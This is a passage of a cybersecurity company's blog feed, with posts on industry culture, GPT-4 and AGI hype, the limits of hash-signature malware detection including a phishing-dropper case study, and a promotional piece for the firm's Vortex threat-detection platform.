value.</blockquote><blockquote>Addressing Flawed Testing: Rigorous and standardized testing procedures are crucial to enhance the reliability and resilience of cybersecurity solutions.</blockquote><blockquote>Challenging VC-backed Companies: Shifting the focus towards long-term cybersecurity goals helps protect digital assets and user data from the profit-driven mindset of venture capital-backed companies.</blockquote><blockquote>Advancing Collaboration and Partnership Transparency: Prioritizing transparency and trust in in-house collaborations fosters better insights, collective problem-solving, and stronger cybersecurity practices.</blockquote><h2 id="the-culture-of-repetition">The Culture of Repetition</h2><p>The culture of repetition in the cybersecurity world refers to the tendency to follow established practices without questioning their effectiveness or exploring innovative approaches. This culture stifles creativity, inhibits the development of new solutions, and leaves vulnerabilities unaddressed.</p><p>The repetition often arises from a fear of deviating from established norms, a reliance on outdated methodologies, or a lack of awareness about alternative approaches. This can result in the perpetuation of ineffective security measures and an inability to adapt to evolving threats.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/06/CS-poster.png" class="kg-image" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"></figure><blockquote><strong>Cyber pundits</strong>, commonly referred to as experts or thought leaders in the cybersecurity field, often occupy influential positions within the industry. These individuals are sought after for their insights and opinions on emerging threats, technologies, and strategies. </blockquote><p>However, a significant portion of these cyber pundits tends to rehash the same ideas, theories, and recommendations without offering fresh perspectives or engaging in meaningful discussions.</p><blockquote><strong>The phenomenon of cyber coolies</strong>, on the other hand, refers to the vast workforce in the cybersecurity industry that executes routine tasks without critical thinking or innovation. </blockquote><p>These individuals are often limited to performing repetitive actions based on pre-established protocols, stifling their ability to contribute to transformative R&amp;D efforts.</p><p>The consequences of this culture of repetition are twofold. </p><p>Firstly, it leads to a <strong>lack of innovation within the cybersecurity ecosystem</strong>. When cyber pundits and cyber coolies continuously repeat the same practices and solutions, they fail to adapt to emerging threats and technological advancements. Consequently, cyber attackers exploit vulnerabilities that go unnoticed, resulting in significant breaches and data compromises.</p><p>Secondly, this <strong>culture inhibits the development of new R&amp;D initiatives</strong>. Without questioning the status quo, the cybersecurity industry becomes complacent and fails to invest in cutting-edge research and innovative solutions. As a result, the industry lags behind the rapidly evolving threat landscape, leaving organizations and individuals vulnerable to cyberattacks.</p><p></p><h2 id="the-need-for-a-shift">The Need for a Shift</h2><p>To overcome the stagnation caused by repetitive raga within the cybersecurity ecosystem, it is essential to foster an environment that encourages diversity of thought, innovation, and critical inquiry. This shift requires the emergence of new voices that challenge prevailing assumptions, introduce fresh perspectives, and promote a culture of continuous improvement.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2025/02/image-1.png" class="kg-image" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://portal.cyberstanc.com/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">CS Portal</div><div class="kg-bookmark-description">Cyberstanc is a technology-driven cybersecurity company specializing in zero-day malware , ransomware, and pre-attack detection scenarios.🚀</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://portal.cyberstanc.com/favicon.ico" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"></div></div></a></figure><p></p><h2 id="questioning-the-status-quo"><strong>Questioning the Status Quo</strong></h2><p>In order to break free from the cycle of repetition, individuals within the cybersecurity ecosystem must become more vigilant and inquisitive. Asking critical questions is crucial for identifying weaknesses, exploring new avenues, and driving innovation. By encouraging a culture of questioning, cyber pundits and cyber coolies can contribute to a more robust and resilient cybersecurity ecosystem.</p><h3 id="embracing-collaboration-and-interdisciplinary-approaches">Embracing Collaboration and Interdisciplinary Approaches</h3><p>In today's complex and rapidly evolving cybersecurity landscape, embracing collaboration and interdisciplinary approaches is crucial for startups and companies. </p><p>By breaking down silos and fostering open communication, organizations can harness the collective expertise of individuals from diverse backgrounds such as technology, psychology, law, and business.</p><p>This multidisciplinary approach enables a holistic understanding of cyber threats and facilitates the development of comprehensive solutions. Furthermore, startups and companies should actively seek partnerships with academic institutions, government agencies, and industry experts to leverage their specialized knowledge and resources. </p><p>By working together, sharing insights, and pooling resources, we can effectively tackle the ever-growing challenges in cybersecurity and ensure a safer digital environment for all.</p><h3 id="promoting-education-and-awareness">Promoting Education and Awareness</h3><p>Education and awareness play a vital role in cultivating a more vigilant cybersecurity ecosystem. Organizations and academic institutions should prioritize the development of comprehensive cybersecurity curricula that encourage critical thinking, problem-solving, and creativity. </p><p>Additionally, initiatives should be undertaken to raise public awareness about the importance of cybersecurity, empowering individuals to actively participate in safeguarding their digital lives.</p><h3 id="investing-in-research-and-development">Investing in Research and Development</h3><p>Investing in Research and Development (R&amp;D) is crucial for the growth and success of startups and companies in the cybersecurity industry. By allocating resources and efforts towards R&amp;D, organizations can stay ahead of emerging threats and develop innovative solutions. </p><p>Here are key ways startups and companies can effectively work on R&amp;D:</p><blockquote>Establish R&amp;D teams: Form dedicated teams focused on researching and developing new technologies, methodologies, and best practices in cybersecurity.</blockquote><blockquote>Foster collaboration: Encourage cross-functional collaboration and partnerships with academia, industry experts, and other organizations to leverage collective knowledge and expertise.</blockquote><blockquote>Allocate resources: Dedicate sufficient budget and resources specifically for R&amp;D activities, enabling experimentation, testing, and prototyping of new ideas.</blockquote><blockquote>Embrace innovation culture: Create an environment that encourages creativity, risk-taking, and out-of-the-box thinking to foster innovation within the organization.</blockquote><h2 id="promoting-positive-change-in-cybersecurity-a-call-for-vigilance-and-collaboration">Promoting Positive Change in Cybersecurity: A Call for Vigilance and Collaboration</h2><p>The CyberStanc team firmly believes in the importance of a positive and collaborative approach to cybersecurity. We understand that the industry is facing numerous challenges, such as a lack of innovation and a focus on profit over security. However, we are committed to driving positive change and contributing to the betterment of the cybersecurity industry.</p><p>Rather than engaging in negative behavior, such as targeting individuals or ranting about specific practices, we advocate for a culture of vigilance and innovation. By working together as vigilant and innovative companies, we can create a cybersecurity ecosystem that is focused on continuous improvement and the protection of digital assets.</p><p>We recognize the need for a culture shift in industries that prioritize financial gain without considering cybersecurity goals. Our aim is to inspire others to adopt a similar mindset and encourage a collective effort towards a more secure digital landscape. We believe that by leading by example, we can influence others to prioritize cybersecurity and contribute to the development of safer practices.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/06/Teal-Slate-Grey-Orange-Typelectric-Gaming-Instagram-Post-Video.gif" class="kg-image" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"></figure><p>In conclusion, we invite all innovators and passionate individuals to join us in driving a culture shift in cybersecurity. If you believe in the power of collaboration and want to contribute to co-building new R&amp;D initiatives, we encourage you to connect with us at <a href="mailto:partner@cyberstanc.com">partner@cyberstanc.com</a> or reach out to us directly through our website's contact form at <a href="https://cyberstanc.com/contact-us/">https://cyberstanc.com/contact-us/</a>. </p><p>Together, we can work towards a brighter future for cybersecurity, promoting innovation and advancing the industry's collective goal of safeguarding our digital world. Let's create a new culture of cybersecurity excellence and make a lasting impact together for generations to come.</p>]]></content:encoded></item><item><title><![CDATA[Ghost in the Code: New AI System's Hair-Raising Human Reasoning Abilities]]></title><description><![CDATA[<p>By:- Cyberstanc Team</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/image.png" class="kg-image" alt></figure><p></p><blockquote><strong>Did you know that the term "ghost in the code" is inspired by the famous philosophical thought experiment known as the "Chinese Room" argument?</strong></blockquote><p>In this scenario, a person who does not understand Chinese is locked in a room with a book containing instructions in English</p>]]></description><link>https://cyberstanc.com/blog/ghost-in-the-code-new-ai-systems-hair-raising-human-reasoning-abilities/</link><guid isPermaLink="false">646835bf125678f5d7f6b0e9</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Wed, 17 May 2023 23:36:31 GMT</pubDate><content:encoded><![CDATA[<p>By:- Cyberstanc Team</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/image.png" class="kg-image" alt></figure><p></p><blockquote><strong>Did you know that the term "ghost in the code" is inspired by the famous philosophical thought experiment known as the "Chinese Room" argument?</strong></blockquote><p>In this scenario, a person who does not understand Chinese is locked in a room with a book containing instructions in English on how to respond to Chinese text. The person follows the instructions to generate appropriate responses, fooling others into thinking they understand Chinese. </p><p>This experiment raises questions about whether genuine understanding and consciousness can arise solely from manipulating symbols or code, just like the ghost in the machine.</p><h2 id="let-s-talk-about-today-new-ai-box">Let's talk about today <strong>NEW AI BOX</strong></h2><blockquote><br>GPT-4's Puzzle-Solving Ability<br>Artificial General Intelligence, GPT-4: A Closer Look at its Capabilities<br>Implications and Risks of AGI and LLMs<br>The Need for Balanced Perspectives; Cyberstanc's Research and Dedication</blockquote><p>In the not-too-distant future, GPT-4's puzzle-solving ability becomes legendary, propelling AI towards achieving Artificial General Intelligence (AGI). Controversies and skepticism fuel intense debates, while cyberstanc invests in research to explore GPT-4's full capabilities. As society grapples with the implications and risks, maintaining balanced perspectives becomes crucial in navigating potential crises on the path to a more intelligent future.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/05/CS-AI.png" class="kg-image" alt></figure><p></p><blockquote><strong>AI making human reasoning, GPT-4's Puzzle-Solving Ability</strong></blockquote><p><br>In a chilling turn of events, a new artificial intelligence system called GPT-4 has emerged, displaying hair-raising human reasoning abilities. The story begins with an ambitious experiment to test the AI system's understanding of the physical world. Little did they know what they were about to uncover.</p><p>As they presented GPT-4 with a perplexing puzzle involving a book, nine eggs, a laptop, a bottle, and a nail, they expected a straightforward response. However, what they received was beyond their wildest imaginations. The AI system's solution was not only ingenious but also demonstrated a level of reasoning reminiscent of human intelligence.</p><p>This unprecedented display of human-like reasoning left the researchers questioning whether they had stumbled upon a new form of intelligence altogether. Their findings were documented in a research paper titled "<strong>Sparks of Artificial General Intelligence</strong>," published on an internet research repository. This publication, coming from a major tech company sent shockwaves through the industry, igniting a heated debate.</p><p>"<a href="https://arxiv.org/abs/2303.12712">https://arxiv.org/abs/2303.12712</a>"</p><p>"<a href="https://arxiv.org/pdf/2303.12712.pdf">https://arxiv.org/pdf/2303.12712.pdf</a>"</p><p></p><blockquote><strong>Artificial General Intelligence</strong></blockquote><p>The pursuit of artificial general intelligence, or AGI, has long captivated the minds of technologists. AGI represents the pinnacle of AI development—a machine capable of emulating any task that a human brain can perform. However, claims related to AGI have proven to be treacherous waters for computer scientists. Varying interpretations of intelligence and the potential dangers associated with AGI make it a topic shrouded in controversy.</p><p><strong>In the not-too-distant future, the puzzle-solving ability of GPT-4 becomes legendary, pushing the boundaries of artificial intelligence towards the coveted goal of Artificial General Intelligence (AGI).</strong></p><h2 id="despite-the-challenges-agi-development-opens-up-a-world-of-possibilities-and-potential-applications-">Despite the challenges, AGI development opens up a world of possibilities and potential applications. </h2><p>Here are some exciting future use cases:</p><ol><li><strong>Medical Breakthroughs</strong>: AGI-powered systems can analyze vast medical databases, identify patterns, and assist in diagnosing complex diseases, leading to more accurate treatments and personalized healthcare.</li><li><strong>Autonomous Transportation</strong>: AGI-enabled self-driving vehicles can revolutionize transportation by enhancing safety, reducing traffic congestion, and improving overall efficiency, leading to smoother and more accessible mobility for all.</li><li><strong>Advanced Robotics</strong>: AGI-driven robots can perform intricate tasks in various industries, from manufacturing and construction augmenting human capabilities and increasing productivity.</li><li><strong>Scientific Discoveries</strong>: AGI can assist scientists in analyzing complex data sets, simulating experiments, and uncovering new insights across disciplines such as physics, chemistry, and astronomy, accelerating our understanding of the universe.</li><li><strong>Creative Endeavors</strong>: AGI systems can generate original music, artwork, literature, and other forms of creative expression, collaborating with human artists and pushing the boundaries of artistic innovation.</li></ol><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/05/image-1.png" class="kg-image" alt></figure><p></p><blockquote><strong>Implications and Risks of AGI and LLMs</strong></blockquote><p>From politics to physics, history to computer science, medicine to philosophy, GPT-4 synthesizes information and provides nuanced responses that astound its human counterparts.</p><p><strong>GPT, Bard, </strong>and other <strong>LLMs</strong> hold great promise in the realm of AI and natural language processing. However, to leverage their full potential in critical applications, one must be well-versed with their limitations. </p><p>1️⃣ Accuracy: While LLMs can generate text that appears coherent, the accuracy of the information cannot always be guaranteed. It's important to fact-check and verify the generated content.</p><p>2️⃣ Fact Rewind: The true power of LLMs lies in their ability to generate coherent and contextually relevant text, rather than merely recalling facts – a feat even the most basic databases excel in. LLMs are not a substitute for comprehensive knowledge.</p><p>3️⃣ Explainability: It can be challenging to discern the rationale behind the text generated by LLMs, making their explainability limited. Understanding the reasoning behind their outputs becomes crucial in critical decision-making scenarios.</p><p>4️⃣ Ethical Considerations: LLMs raise important ethical concerns, such as biases present in the training data and potential misuse of AI-generated content.</p><p>While LLMs have their limitations, they still offer tremendous value in various applications. However, it is vital to approach them with a critical mindset and use them as tools, complementing human expertise and judgment.</p><p>In this era of rapidly advancing AI technologies, understanding the limitations of LLMs ensures responsible and informed usage, paving the way for more accurate, reliable, and ethically sound AI applications.</p><p>The future holds both great promise and potential challenges as AGI shapes our world. By embracing a balanced perspective and ensuring a responsible approach, we can navigate the ever-changing landscape of AGI and unlock its transformative potential while mitigating its inherent risks.</p><p>The future holds both great promise and potential challenges as AGI continues to evolve and shape our world.</p><blockquote><strong>The Need for Balanced Perspectives; Cyberstanc's Research and Dedication</strong></blockquote><p>As we venture further into the era of AGI development, these exciting possibilities demonstrate the potential for revolutionary advancements in various fields. However, the major crisis ahead will test our ability to navigate the ethical, societal, and existential challenges that come with creating machines that rival human intelligence.</p><p><strong>Despite the skepticism surrounding AGI claims, experts argue that the advancements made in AI, especially with systems like GPT-4, have brought us closer to achieving genuine human-like reasoning. </strong></p><p>Developed by OpenAI, GPT-4 represents the epitome of language models, having meticulously analyzed vast amounts of digital text. It can generate its own coherent and contextually relevant text, engage in conversations, and even produce mathematically poetic proofs.</p><p>The emergence of AGI raises the need for balanced perspectives and cautious approaches. Whether this development represents a significant stride or a mere stepping stone is yet to be determined. As we delve into the possibilities and challenges posed by increasingly intelligent machines, it is essential to maintain a nuanced understanding.</p><p><strong>As a ghost in the code, We'll continue to observe and report on the developments in AI, shedding light on the fascinating intersections between technology and humanity.</strong></p><p>With the power and potential of AGI, it becomes crucial to monitor and limit its use cases, ensuring responsible and ethical implementation.</p><p>Amidst these debates, Cyberstanc emerges as a leading force in shaping the future of technology. With their commitment to staying ahead of cyber risk and threats, their cutting-edge cybersecurity solutions, such as the Vortex platform, empower organizations to safeguard their digital and future assets. </p><p>At Cyberstanc, we are committed to pushing the boundaries of technology through our dedicated R&amp;D center. </p><p>We strive to explore new frontiers and advance the field of AI, opening doors to exciting possibilities. If there's a specific area of technology you'd like us to highlight or delve into, let us know! </p><p><strong>Stay tuned for more intriguing tales from the realm of artificial intelligence and cybersecurity. We appreciate your support and encourage you to like and comment on our blog posts.</strong></p>]]></content:encoded></item><item><title><![CDATA[The Truth About Hash Signatures and Malware Detection]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/CS.png" class="kg-image" alt></figure><h2 id="it-is-common-for-malware-samples-to-remain-undetectable-for-hours-or-days-or-even-weeks-">It is common for malware samples to remain undetectable for hours or days or even weeks.</h2><p></p><p>This is because malware writers are continuously creating new techniques to evade detection. As a result, it is necessary for users to have a comprehensive and fast detection rate for malware. </p><p>To use VirusTotal</p>]]></description><link>https://cyberstanc.com/blog/the-truth-about-hash-signatures-and-malware-detection/</link><guid isPermaLink="false">645744cdb517df1db2bd6c8a</guid><category><![CDATA[malware]]></category><category><![CDATA[Scrutiny]]></category><category><![CDATA[trojan]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Sat, 06 May 2023 20:30:07 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/CS.png" class="kg-image" alt></figure><h2 id="it-is-common-for-malware-samples-to-remain-undetectable-for-hours-or-days-or-even-weeks-">It is common for malware samples to remain undetectable for hours or days or even weeks.</h2><p></p><p>This is because malware writers are continuously creating new techniques to evade detection. As a result, it is necessary for users to have a comprehensive and fast detection rate for malware. </p><p>To use VirusTotal or other multi-scanning platforms, users can submit a file on the website or use the email submission feature. Users can also search the existing database of scanned files based on a sha1, sha256, or md5 hash value. After the upload, the file is scanned with different products and their engines, and the results are available for everyone. </p><h3 id="to-bypass-antivirus-software-malware-creators-often-use-techniques-like-obfuscation-encryption-and-polymorphism-">To bypass antivirus software, malware creators often use techniques like obfuscation, encryption, and polymorphism. </h3><blockquote>Obfuscation is the process of disguising the code to make it harder to detect. Encryption involves encrypting the malware code to make it unreadable to antivirus software. Polymorphism is the ability of malware to change its code every time it's executed, making it even more difficult to detect.</blockquote><p>In case some products or engines are not detecting the sample as malware, the file was not rated malicious by using the signatures provided in that particular engine or product. </p><blockquote>If a malicious file is not detected as malicious in such a multi online scanner, users cannot automatically conclude, out of this analysis, that some new malware is actually not detected or stopped by their AV product. </blockquote><p>To combat malware bypassing, antivirus software vendors use a variety of techniques. One such technique is behavioral analysis, which involves analyzing the behavior of the malware rather than its code. Another technique is machine learning, which involves training a machine learning algorithm to recognize malware based on patterns in the code.</p><h3 id="a-huge-difference-users-should-know-about-while-using-the-public-services-the-online-multi-scanner-analyses-can-give-users-an-initial-idea-of-the-file-checked-but-not-more-users-need-to-know-how-to-interpret-and-read-the-results-properly-">A huge difference users should know about while using the public services. The online multi scanner analyses can give users an initial idea of the file checked, but not more. Users need to know how to interpret and read the results properly.</h3><p></p><p>Unfortunately, some script kiddies or wannabee malware writers are still using public online scanning services to test their newly created malware creations and to check whether they are detected or not. </p><blockquote>Underground members have set up their own services and sites where they can upload their own new malware. These sites are not forwarding the files to the security software vendors. If users stumble upon such an underground scanner website, they cannot rely upon the results presented.</blockquote><h2 id="case-study-beware-of-valyrian-malware-named-after-game-of-thrones-indestructible-steel-now-targeting-your-computer">Case Study:- Beware of Valyrian Malware: Named After Game of Thrones' Indestructible Steel, Now Targeting Your Computer</h2><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/1683392412430.jpg" class="kg-image" alt></figure><p>Valyrian Malware, named after the indestructible steel in Game of Thrones, is a particularly dangerous malware that poses a significant threat to computers and cybersecurity. The malware is distributed through fake Windows updates, malicious third-party applications, or weaponized attachments sent via email or social media.</p><p>Recently, a phishing attempt targeted an unsuspecting recipient with a password-protected ZIP file containing a malicious Word document. Once the malware infects a system, it remains concealed and executes its malicious activities every time the computer is turned on. This makes it particularly difficult to detect and prevent, as traditional anti-virus solutions may not be able to identify the malware.</p><p></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/cd1.png" class="kg-image" alt></figure><p></p><blockquote>It is important to note that Valyrian Malware can be disguised in innocuous-looking files like 'Chinese Delegation.doc.' This highlights the need for computer users to exercise caution when downloading or opening attachments, especially from unknown or suspicious sources.</blockquote><p>Valyrian Malware is an example of a zero-day exploit, which means it is a vulnerability that is unknown to software developers or security professionals. As a result, there may not be any available patches or fixes to prevent the malware from infecting a system.</p><p>Valyrian Malware is capable of performing a wide range of malicious activities, including stealing sensitive information, installing other malware, or even taking over control of the infected computer. The malware is designed to remain undetected for as long as possible, making it a dangerous and persistent threat.</p><p>The recent phishing attempt used a password-protected ZIP file containing a malicious Word document that exhibited heuristics such as macro with DLL reference and macro with startup hook, common tactics for accessing APIs. This breakthrough in threat detection and prevention is a game-changer. However, there are still many anti-virus solutions that are unaware of the threat.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/cd2.png" class="kg-image" alt></figure><p></p><h3 id="this-myth-is-probably-because-people-equate-signatures-with-pattern-based-detection-">This myth is probably because people equate signatures with pattern-based detection. </h3><blockquote>AI-based malware detection is not a replacement for traditional antivirus software but a new complement to it.</blockquote><blockquote>The undecidability of virus/malware detection does not mean it is impractical, but constant work and improvements are necessary to stay useful.</blockquote><blockquote>New methods go far beyond pattern signatures and hashes, including emulation, deep scanning, in-memory scanning, algorithm-based signatures, behavior blockers, network scanning, and artificial intelligence (AI).</blockquote><blockquote>EDR/Antivirus products cannot afford false positives and are unfairly compared to applications that can avoid disrupting legitimate user activity.</blockquote><blockquote>VirusTotal testing strategy is flawed because scanning engines on VirusTotal only support a fraction of the capabilities that the real products have.</blockquote><blockquote>Malware developers are actively trying to create malware that antivirus products cannot detect.</blockquote><blockquote>AI technologies serve many purposes, including malware clustering, malware detection on client systems, and automatic signature creation.</blockquote><p></p><h2 id="the-role-of-emulation-and-depth-scanning-in-malware-detection">The Role of Emulation and Depth Scanning in Malware Detection</h2><p>Recently, an innocuous looking file named 'Chinese Delegation.doc' <strong>2ffd8e9fc1f91c6ce5570131ae5dc0607bfc283012e33db4f489db0ff1ccbaf5</strong> was used in a phishing attempt that could have caused significant damage. The file was actually a password-protected ZIP file containing a malicious Word document, which exhibited heuristics such as macro with DLL reference and macro with startup hook. These are common tactics for accessing APIs, which can be used to carry out cyber attacks. .</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/v2.png" class="kg-image" alt></figure><p></p><h3 id="traditional-antivirus-solutions-were-unable-to-detect-the-malware-until-1-2-weeks-after-the-initial-attack-in-fact-many-antivirus-solutions-still-lack-the-ability-to-detect-such-threats-the-hash-2ffd8e9fc1f91c6ce5570131ae5dc0607bfc283012e33db4f489db0ff1ccbaf5-is-a-virus-dropper-that-was-uploaded-with-few-detections-and-later-adopted-by-av-vendors-">Traditional antivirus solutions were unable to detect the malware until 1-2 weeks after the initial attack. In fact, many antivirus solutions still lack the ability to detect such threats. The hash "2ffd8e9fc1f91c6ce5570131ae5dc0607bfc283012e33db4f489db0ff1ccbaf5" is a virus dropper that was uploaded with few detections, and later adopted by AV vendors.</h3><p></p><h3 id="to-bypass-solutions-attackers-use-several-techniques-">To bypass solutions, attackers use several techniques. </h3><blockquote>For example, they might encrypt the payload using various encryption techniques. They also obfuscate the code, so that it becomes difficult to reverse engineer.</blockquote><blockquote>Another technique is to create a dropper that downloads the payload from a remote server, making it difficult for the antivirus to detect. </blockquote><blockquote>One of the most common techniques used by attackers is "fileless malware." This type of malware operates entirely in memory and leaves no footprint on the system's disk. It runs as part of a legitimate process and is almost impossible to detect using traditional antivirus solutions.</blockquote><p>Some EDR/Antivirus solutions have been using other malware detection technologies for at least a decade. These technologies include emulation, depth scanning, in-memory scanning, algorithm-based signatures, behavior blockers, network scanning, and more. While other antivirus solutions still use pattern signatures and hashes.</p><h2 id="the-risks-of-relying-solely-on-signature-hash-pass-in-malware-defense">The Risks of Relying Solely on Signature Hash Pass in Malware Defense</h2><p>The process of re-scanning entails the submission of a previously analyzed file to VirusTotal and performing a fresh analysis utilizing the latest versions of antivirus (AV) engines. </p><p>This enables researchers to ascertain if new detection techniques have been implemented and if the AV engines have updated their databases with new signatures for known malware or new nomenclature based on scanning. </p><p>The practice of re-scanning a previously analyzed file can potentially result in the detection of previously unnoticed threats, which can then be flagged and added to the AV databases. </p><p>This approach enhances the detection and prevention capabilities of all users. However, it should be noted that this method relies on the collection of signature database hashes against new variants or existing malware families.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/05/v1.png" class="kg-image" alt></figure><p>In conclusion, malware detection is an ongoing battle between attackers and defenders. </p><p>If these solutions are not regularly updated or evolved, they are doing nothing to participate in the cyberwar between anti-malware software and malware authors.</p><blockquote>As many advance APT and ransomware groups use various techniques to hide the internals of malware, making it difficult to detect and analyze. Packer compresses the original malware file, making it unreadable until it decompresses itself at runtime. </blockquote><blockquote>Crypters encrypt, obfuscate, and manipulate malware to make it difficult for security programs to detect. Protectors are software that keeps an application encrypted and protected against reverse engineering, with some added features that build several protective layers around the payload that researchers have to face. </blockquote><blockquote>Although these techniques make it challenging to detect and analyze malware, tools and programs are available to identify commercial packers and advise on how to unpack them. </blockquote><p>Don't wait until it's too late to secure your organization's digital assets. Cyber threats are constantly evolving, but so are our cybersecurity solutions. Our team at Cyberstanc is committed to staying ahead of the curve and providing the latest in threat intelligence, malware detection, and analytics.</p><blockquote>Interested in learning more? Shoot us an email at <a href="mailto:sales@cyberstanc.com">sales@cyberstanc.com</a> and let's start a conversation about how we can help you protect your organization. With Vortex, our powerful cybersecurity platform, you'll have access to cutting-edge technology that can help you stay one step ahead of cybercriminals.</blockquote><p>Our R&amp;D center is always developing new technologies to fight against malicious software and APT groups. And with our Pay-As-You-Go model, you can be sure that you're only paying for what you need. </p><h3 id="so-why-wait">So why wait? </h3><h2 id="try-our-flagship-vortex-and-scrutiny-technologies-today-and-see-the-difference-for-yourself-">Try our flagship Vortex and Scrutiny technologies today and see the difference for yourself.</h2>]]></content:encoded></item><item><title><![CDATA[Cyberstanc Vortex: A Futuristic Approach to Cybersecurity with Unmatched Accuracy and Reliability in Threat Detection and Mitigation]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/VOrtex-blog.png" class="kg-image" alt></figure><p><br>The rise of cyber attacks and supply-chain attacks has made it necessary for businesses to invest in advance protection to protect against malware and advance threat to enhance overall protection capabilities. </p><blockquote>In this blog, we will delve deeper into what Cyberstanc Vortex is and how it offers better technology and</blockquote>]]></description><link>https://cyberstanc.com/blog/vortex/</link><guid isPermaLink="false">64425fc86b4430a0323cc679</guid><category><![CDATA[malware]]></category><category><![CDATA[ransomware]]></category><category><![CDATA[Scrutiny]]></category><category><![CDATA[swatbox]]></category><category><![CDATA[trojan]]></category><category><![CDATA[product launch]]></category><category><![CDATA[R&D]]></category><category><![CDATA[OEMs]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Mon, 24 Apr 2023 18:11:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/VOrtex-blog.png" class="kg-image" alt></figure><p><br>The rise of cyber attacks and supply-chain attacks has made it necessary for businesses to invest in advance protection to protect against malware and advance threat to enhance overall protection capabilities. </p><blockquote>In this blog, we will delve deeper into what Cyberstanc Vortex is and how it offers better technology and detection prospects than other available platforms.</blockquote><h3 id="cyberstanc-vortex-is-a-cutting-edge-threat-detection-platform-that-is-set-to-revolutionize-the-way-organizations-protect-themselves-from-cyber-threats-it-is-a-platform-that-combines-state-of-the-art-tools-services-and-proprietary-engines-to-extract-indicators-of-compromise-iocs-and-threat-information-from-files-documents-images-and-unknown-file-types-at-scale-and-speed-"><br>Cyberstanc Vortex is a cutting-edge threat detection platform that is set to revolutionize the way organizations protect themselves from cyber threats. It is a platform that combines state-of-the-art tools, services, and proprietary engines to extract Indicators of Compromise (IOCs) and threat information from files, documents, images, and unknown file types at scale and speed. </h3><p></p><blockquote>Inspired by the natural abilities of the <strong>peacock</strong>, this cutting-edge platform is designed to excel at catching all kinds of cyber threats - just like how the peacock excels at catching worms, rats, snakes, and other creatures. But that's not all. The peacock's iridescent feathers attract mates, just like the scrutiny engine detects unnoticed malware, and offers protection against predators.</blockquote><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/VSF.gif" class="kg-image" alt></figure><p></p><p>The solution goes deeper than traditional static analysis tools and provides actionable intelligence in many more cases, reducing the number of artifacts that need to be sandboxed in an otherwise time-consuming and resource-intensive process.</p><p></p><h1 id="-state-of-the-art-threat-detection-">**State-of-the-Art Threat Detection**</h1><p></p><p><strong>The Cyberstanc Vortex platform offers a technical demo showcasing its easy API integration and agent-based use cases for endpoint, network, email, and storage protection.</strong> Its state-of-the-art threat detection system covers most of the grey areas that attackers target or plan to exploit in the future.</p><blockquote><br><strong>Scrutiny integrated engine and custom co-build agent</strong> includes wide range of executables, documents, scripts, and common file-types.</blockquote><blockquote><br><strong>Simulation Intelligence of highly obfuscated and real-word malware techniques</strong> including macro malware, VBA, VBS, PowerShell, DOCx, Calender files, One-Note, Jscript, MSHTA, XSL, and WSF.</blockquote><blockquote><br>Rapid and deep analysis at high scale, REST API for automated integration.</blockquote><blockquote><br>Simple and cost-effective on-premises standalone deployment or public-private cloud.</blockquote><blockquote><br>Designed, engineered, and maintained by experienced Cyberstanc experts.</blockquote><blockquote>Vortex integrates with other security infrastructure, including YARA and MITRE ATT&amp;CK framework, to provide accurate threat detection. Users can add custom YARA rules, and the platform automates some of the analysis and mitigation tasks, reducing the workload of human analysts.</blockquote><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-16.png" class="kg-image" alt></figure><h2 id="vortex-s-approach-to-detection-transparency-interpretability-and-accuracy">Vortex's Approach to Detection: Transparency, Interpretability, and Accuracy</h2><p><br>Vortex places great emphasis on transparency and accountability in their detection engine, recognizing the importance of understanding how a detection system works in order to build trust in its accuracy. </p><blockquote>With detailed information on how our detections are designed, built, and how decisions are made, security teams can be confident in their ability to detect and respond to threats. Additionally, Vortex strives to minimize false positives while maintaining interpretability and transparency, striking a balance between detection accuracy and threat visibility.</blockquote><p>By offering a guarantee of performance for their managed or curated detections, Vortex further reinforces their commitment to transparency and accountability. This not only builds trust in their system but also helps to reduce the risk of false positives. Overall, Vortex's approach to detection emphasizes trust and transparency, which is increasingly important in an industry that is moving towards more sophisticated detection methods.</p><h2 id="streamline-your-threat-analysis-with-next-gen-tools-and-rest-api-integration">Streamline Your Threat Analysis with Next-Gen Tools and REST API Integration</h2><p>The Vortex API provides a way for developers to interact with the Vortex detection engine programmatically. The API documentation includes endpoints for various functions such as user registration, login, 